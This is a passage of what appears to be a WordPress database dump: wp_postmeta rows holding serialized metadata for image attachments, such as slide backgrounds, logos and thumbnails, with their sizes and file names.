:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(271,585,'_wxr_import_parent','163'),(272,586,'_wp_attached_file','2014/06/411.jpg'),(273,586,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:133;s:6:\"height\";i:130;s:4:\"file\";s:15:\"2014/06/411.jpg\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"411-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(274,586,'_wxr_import_parent','163'),(275,587,'_wp_attached_file','2014/06/511.jpg'),(276,587,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:133;s:6:\"height\";i:130;s:4:\"file\";s:15:\"2014/06/511.jpg\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"511-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(277,587,'_wxr_import_parent','163'),(278,588,'_wp_attached_file','2014/07/slidebg4.jpg'),(279,588,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:610;s:4:\"file\";s:20:\"2014/07/slidebg4.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slidebg4-300x95.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"slidebg4-1024x325.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:325;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"slidebg4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"slidebg4-768x244.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"slidebg4-1536x488.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"slidebg4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:21:\"slidebg4-1670x531.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:21:\"slidebg4-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:20:\"slidebg4-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:20:\"slidebg4-880x280.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:20:\"slidebg4-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:20:\"slidebg4-450x143.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:20:\"slidebg4-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(280,589,'_wp_attached_file','2014/07/slidebg22.jpg'),(281,589,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:610;s:4:\"file\";s:21:\"2014/07/slidebg22.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"slidebg22-300x95.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"slidebg22-1024x325.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:325;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"slidebg22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"slidebg22-768x244.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"slidebg22-1536x488.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"slidebg22-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"slidebg22-1670x531.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"slidebg22-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"slidebg22-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"slidebg22-880x280.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"slidebg22-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"slidebg22-450x143.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"slidebg22-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(282,595,'_wp_attached_file','2014/06/611.jpg'),(283,595,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:133;s:6:\"height\";i:130;s:4:\"file\";s:15:\"2014/06/611.jpg\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"611-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(284,595,'_wxr_import_parent','163'),(285,596,'_wp_attached_file','2014/07/logo-dark1.png'),(286,596,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:166;s:6:\"height\";i:70;s:4:\"file\";s:22:\"2014/07/logo-dark1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"logo-dark1-150x70.png\";s:5:\"width\";i:150;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"logo-dark1-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(287,597,'_wp_attached_file','2014/07/logo7.png'),(288,597,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:166;s:6:\"height\";i:70;s:4:\"file\";s:17:\"2014/07/logo7.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"logo7-150x70.png\";s:5:\"width\";i:150;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"logo7-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(289,601,'_wp_attached_file','2014/06/mac1.png'),(290,601,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:532;s:6:\"height\";i:443;s:4:\"file\";s:16:\"2014/06/mac1.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"mac1-300x250.png\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"mac1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"mac1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:16:\"mac1-532x380.png\";s:5:\"width\";i:532;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:16:\"mac1-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:16:\"mac1-450x375.png\";s:5:\"width\";i:450;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:16:\"mac1-450x443.png\";s:5:\"width\";i:450;s:6:\"height\";i:443;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(292,606,'_wp_attached_file','2014/06/features-iphone1.png'),(293,606,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:426;s:6:\"height\";i:578;s:4:\"file\";s:28:\"2014/06/features-iphone1.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"features-iphone1-221x300.png\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"features-iphone1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"features-iphone1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:28:\"features-iphone1-426x500.png\";s:5:\"width\";i:426;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:28:\"features-iphone1-426x380.png\";s:5:\"width\";i:426;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:28:\"features-iphone1-426x350.png\";s:5:\"width\";i:426;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:28:\"features-iphone1-426x450.png\";s:5:\"width\";i:426;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(295,618,'_wp_attached_file','2014/07/nonslidebg21.jpg'),(296,618,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:610;s:4:\"file\";s:24:\"2014/07/nonslidebg21.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"nonslidebg21-300x95.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"nonslidebg21-1024x325.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:325;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"nonslidebg21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"nonslidebg21-768x244.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:25:\"nonslidebg21-1536x488.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"nonslidebg21-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:25:\"nonslidebg21-1670x531.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:25:\"nonslidebg21-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:24:\"nonslidebg21-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:24:\"nonslidebg21-880x280.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:24:\"nonslidebg21-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:24:\"nonslidebg21-450x143.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:24:\"nonslidebg21-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(297,619,'_wp_attached_file','2014/07/slidebg5.jpg'),(298,619,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:610;s:4:\"file\";s:20:\"2014/07/slidebg5.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slidebg5-300x95.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"slidebg5-1024x325.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:325;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"slidebg5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"slidebg5-768x244.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"slidebg5-1536x488.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"slidebg5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:21:\"slidebg5-1670x531.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:21:\"slidebg5-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:20:\"slidebg5-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:20:\"slidebg5-880x280.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:20:\"slidebg5-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:20:\"slidebg5-450x143.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:20:\"slidebg5-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(299,621,'_wp_attached_file','2014/07/slidebg23.jpg'),(300,621,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:610;s:4:\"file\";s:21:\"2014/07/slidebg23.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"slidebg23-300x95.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"slidebg23-1024x325.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:325;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"slidebg23-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"slidebg23-768x244.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"slidebg23-1536x488.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"slidebg23-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"slidebg23-1670x531.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"slidebg23-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"slidebg23-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"slidebg23-880x280.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"slidebg23-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"slidebg23-450x143.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"slidebg23-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(301,634,'_wp_attached_file','2014/07/favicon.png'),(302,634,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:16;s:6:\"height\";i:16;s:4:\"file\";s:19:\"2014/07/favicon.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(303,924,'_wp_attached_file','2014/06/testimonials-1.jpg'),(304,924,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1172;s:4:\"file\";s:26:\"2014/06/testimonials-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"testimonials-1-300x183.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"testimonials-1-1024x625.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:625;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"testimonials-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"testimonials-1-768x469.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:469;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:27:\"testimonials-1-1536x938.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:938;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"testimonials-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:28:\"testimonials-1-1670x1019.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:1019;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:27:\"testimonials-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:26:\"testimonials-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\